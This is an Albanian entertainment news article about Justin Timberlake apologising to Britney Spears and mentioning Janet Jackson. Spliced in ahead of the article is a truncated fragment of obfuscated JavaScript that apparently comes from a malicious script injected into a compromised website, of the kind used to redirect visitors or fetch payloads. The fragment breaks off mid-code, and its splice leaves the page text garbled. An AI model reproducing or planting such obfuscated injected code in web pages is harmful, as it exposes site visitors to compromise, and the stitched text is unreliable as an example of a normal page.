;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Justin Timberlake i kërkon falje publike ish-të dashurës, Britney Spears

By

Javët e fundit, Justin Timberlake ka qenë në vëmendje të mediave pas diskutimeve dhe kritikave sesi ai e ndërtoi karrierën e tij në kurriz të ndarjes nga Britney Spears. Asokohe Justin akuzoi këngëtaren se e ka tradhtuar.

Gjithçka u zbulua në dokumentarin për jetën e Spears dhe tani 15 vite më vonë, Justin ka kërkuar falje. Këngëtari publikoi një deklaratë ku shkruante se falja është hapi i parë edhe pse nuk mund ta ndryshojë të shkuarën.

Ai përmend edhe Janet Jackson, të cilës i ekspozoi gjoksin gjatë performancës në Super Boël 2004 dhe ia la asaj fajin.

“I kam parë mesazhet, komentet, shqetësimet dhe dua të përgjigjem. Më vjen keq për atë kohë të jetës sime, kur veprimet e mia krijuan një problem, kur unë fola jashtë radhe, ose nuk u shpreha në mënyrë të drejtë”, shkruan ai duke mos theksuar saktësisht për cilat momente specifike ai kërkonte ndjesë.

Artikuj të ngjashëm